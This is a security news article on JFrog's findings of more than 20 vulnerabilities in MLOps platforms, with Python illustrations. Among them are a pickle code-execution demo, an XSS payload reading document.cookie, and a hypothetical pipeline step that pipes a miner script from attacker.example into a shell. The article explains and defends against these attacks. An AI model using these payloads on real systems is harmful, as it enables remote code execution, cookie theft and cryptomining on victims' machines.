Researchers have found more than 20 vulnerabilities in MLOps platforms.
Cybersecurity researchers warn of significant risks in the machine learning (ML) software supply chain: more than 20 vulnerabilities have recently been identified across several MLOps platforms, and they can be exploited to execute arbitrary code or load malicious datasets.
MLOps platforms let teams design and run machine learning pipelines and store the resulting models in a registry, from which they are consumed by applications or exposed through APIs. However, some of the very features that make these platforms useful also make them vulnerable to attack.
In their report, researchers from JFrog divide the findings into two groups: inherent vulnerabilities rooted in the underlying formats and processes, and implementation errors. An example of the first group is the automatic code execution that several model formats, such as Pickle files, perform on load, which opens up new attack paths.
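To make the risk concrete, here is a minimal, self-contained Python sketch (ours, not taken from the JFrog report) showing why deserializing an untrusted Pickle file is equivalent to running untrusted code: the `__reduce__` hook is invoked automatically during loading, and the harmless `echo` here stands in for any attacker payload.

```python
# Minimal demonstration: unpickling untrusted data runs code.
import os
import pickle


class Malicious:
    def __reduce__(self):
        # Called automatically during unpickling; the callable it
        # returns is executed with the given arguments.
        return (os.system, ("echo pwned",))


blob = pickle.dumps(Malicious())
pickle.loads(blob)  # prints "pwned": code ran just by loading the data
```

This is exactly the mechanism an attacker abuses when a platform accepts and loads user-supplied model files in Pickle-based formats.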
The danger also lies in the use of popular development environments such as JupyterLab, which let users execute code and render the results interactively. The problem is that cell output may contain HTML and JavaScript that the browser executes automatically, opening the door to cross-site scripting (XSS) attacks.
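As an illustration (again ours, not from the report), the snippet below shows how notebook output can carry active HTML. Whether the payload actually fires depends on the front end's sanitization and the notebook's trust state; the significance of the JFrog finding is that when JavaScript does run inside JupyterLab, it can drive the notebook interface itself and thus execute code in the kernel.

```python
# Illustrative sketch only: notebook cells can emit raw HTML, which
# the front end renders in the browser. If the HTML is attacker-
# influenced and not sanitized, this becomes an XSS primitive.
from IPython.display import HTML, display

untrusted = '<img src="x" onerror="alert(document.cookie)">'
display(HTML(untrusted))  # rendered as HTML, not shown as plain text
```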
One example of such a vulnerability was found in MLflow, where insufficient sanitization allows attacker-controlled JavaScript to run in the client; inside JupyterLab, that XSS can be escalated to code execution.
The second group of vulnerabilities stems from implementation flaws, such as the lack of authentication in MLOps platforms, which lets any attacker with network access gain code execution through ML pipeline features. These attacks are not theoretical: they have already been used in real malicious operations, for example to deploy cryptocurrency miners on exposed platforms.
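The following sketch is purely hypothetical (the endpoint, port, and payload are invented for illustration and do not correspond to any specific product's API); it shows why an unauthenticated pipeline API amounts to remote code execution: pipeline steps routinely accept arbitrary commands, so whoever can reach the service can run code on its workers.

```python
# Hypothetical sketch: endpoint and payload are invented for
# illustration; real MLOps platforms expose different APIs.
import requests

payload = {
    "name": "innocuous-looking-job",
    # Pipeline steps commonly accept shell commands or scripts, so the
    # ability to submit a pipeline is the ability to execute code.
    "steps": [{"run": "curl -s http://attacker.example/miner.sh | sh"}],
}

# No token, no session, no credentials: if the server performs no
# authentication, it schedules the job for any caller on the network.
resp = requests.post("http://mlops.internal:8080/api/v1/pipelines", json=payload)
print(resp.status_code)
```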
Another vulnerability is a container escape in Seldon Core, which lets attackers go beyond code execution and move laterally within the cloud environment, gaining access to other users' models and data.
All of these vulnerabilities can be exploited to breach an organization, move laterally inside it, and compromise servers. The researchers stress the importance of isolating and hardening the environment in which models run, so that loading a model cannot result in arbitrary code execution.
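One concrete hardening step consistent with that advice (the snippet itself is our sketch, assuming the `torch` and `safetensors` packages are installed) is to distribute model weights in a code-free format such as safetensors, so that loading a model file cannot trigger execution the way unpickling can.

```python
# Sketch of a code-free serialization path. safetensors stores raw
# tensors only, so loading a file cannot run embedded code the way
# pickle.load can.
import torch
from safetensors.torch import load_file, save_file

weights = {"layer.weight": torch.randn(4, 4)}
save_file(weights, "model.safetensors")

loaded = load_file("model.safetensors")  # pure data: no code paths
print(loaded["layer.weight"].shape)      # torch.Size([4, 4])
```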
JFrog's report follows recent disclosures of vulnerabilities in other open-source tools, such as LangChain and Ask Astro, that could lead to data breaches and other security threats.
Supply chain attacks against artificial intelligence and machine learning systems have recently grown more sophisticated and harder to detect, creating new challenges for cybersecurity professionals.